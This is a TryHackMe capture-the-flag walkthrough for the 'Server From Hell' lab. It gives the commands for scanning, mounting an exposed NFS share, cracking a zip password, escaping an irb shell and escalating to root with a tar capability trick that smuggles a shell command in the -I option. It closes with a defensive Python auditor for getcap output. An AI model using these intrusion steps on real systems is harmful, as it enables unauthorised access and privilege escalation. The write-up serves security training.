TryHackMe Walkthrough: The Server From Hell

In this article we are going to solve another TryHackMe challenge, called The Server From Hell, created by Youssef Awad. So without wasting time, let's go.

Level: Easy

Attacking Strategy

  • Enumeration
    • netcat
    • NFS
  • Exploitation
    • cracking zip file
    • irb shell
  • Privilege Escalation
    • getcap to check file capabilities

Enumeration

We use Rustscan for reconnaissance, but the lab description says to check port 1337, so we look there first. It gives a hint that something is in the first 100 ports, so we scan those with Rustscan.

netcat 10.10.50.215 1337
rustscan --ulimit 5001 -r 1-110 10.10.50.215 -- -sC -sV -oN nmap

While checking all 100 ports, our eyes are caught by the banner on port 21, which by default is the FTP service. Here, however, the banner says to check port 12345.

When we check port 12345 with netcat, we find another hint, which leads to NFS. From the hint we learn that the /home/nfs directory can be mounted.

After mounting the file system we find a backup zip, which is password protected.

netcat 10.10.50.215 12345
showmount -e 10.10.50.215
mkdir /tmp/serverfromhell
sudo mount -t nfs 10.10.50.215:/home/nfs /tmp/serverfromhell

Exploitation

Now it's time to crack the zip password. There are different ways to do that: you can use fcrackzip, or you can use John the Ripper.

zip2john backup.zip > backup.hash
john --wordlist=../../rockyou.txt backup.hash

Now we have the password to unzip backup.zip. After extracting it we find a key that lets us log in to the remote server over SSH without a password. On the default port 22 we get a bad request, but there is a hint that says something is running between ports 2500 and 4500, so we load Rustscan again to enumerate further and find an OpenSSH service running on port 3333.

rustscan --ulimit 5001 -r 2500-4500 10.10.50.215 -- -sC -sV -oN hint_nmap

Privilege Escalation

Now let's log in to the server with the id_rsa key. After login we find that we have landed in a Ruby interactive shell (irb); to get bash we have to use the system function.

chmod 0600 id_rsa
ssh -i id_rsa [email protected] -p 3333
system "/bin/bash"

Now it's time to get root. We enumerate further and find a hint about getcap; with the help of GTFOBins we exploit it.

getcap -r / 2>/dev/null
tar xf /root/root.txt -I '/bin/sh -c "cat 1>&2"'
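From the defender's side, the same getcap output is what you audit to catch this misconfiguration before someone else finds it. The script below is an added example, not part of the original walkthrough: it parses `getcap -r /` output (both the older "path = caps" and the newer "path caps" formats) and flags binaries carrying capabilities that bypass file permissions or allow identity changes. The RISKY_CAPS list and the sample output are my own constructed choices; the capability shown on tar in the sample is an assumption for illustration, not a value taken from the box.

```python
import re

# Capabilities that let an ordinary binary bypass file-permission checks or
# change identity; any of these on an unexpected binary is a finding.
RISKY_CAPS = {
    "cap_dac_read_search",  # read any file or directory regardless of mode bits
    "cap_dac_override",     # bypass read/write/execute permission checks
    "cap_setuid", "cap_setgid",  # switch to another uid/gid, including root
    "cap_sys_admin", "cap_sys_ptrace", "cap_chown", "cap_fowner",
}

# getcap prints "path = caps" (older libcap) or "path caps" (newer libcap).
LINE_RE = re.compile(r"^(?P<path>\S+)\s+=?\s*(?P<caps>\S+)$")

def parse_getcap_line(line):
    """Return (path, set of capability names) for one getcap line, else None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    names = set()
    # Cap specs are comma-separated ("cap_a,cap_b+ep", "cap_a=eip"); drop the flags.
    for clause in m.group("caps").split(","):
        name = re.split(r"[=+-]", clause, maxsplit=1)[0]
        if name:
            names.add(name)
    return m.group("path"), names

def audit_getcap(output):
    """Return [(path, [risky caps])] for each binary holding a risky capability."""
    findings = []
    for line in output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps = parsed
        hits = sorted(caps & RISKY_CAPS)
        if hits:
            findings.append((path, hits))
    return findings

# Constructed sample output covering both getcap formats (not from the box).
SAMPLE = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tar = cap_dac_read_search+ep
/usr/bin/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/bin/python3.8 cap_setuid=ep
"""

if __name__ == "__main__":
    for path, caps in audit_getcap(SAMPLE):
        print(f"RISKY {path}: {', '.join(caps)}")
```

Feed it real output with `getcap -r / 2>/dev/null | python3 audit.py` after replacing SAMPLE with `sys.stdin.read()`; anything it reports on a binary that does not need the capability should be removed with `setcap -r`.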

Contact: [email protected] or DM us on Twitter.

Thank you
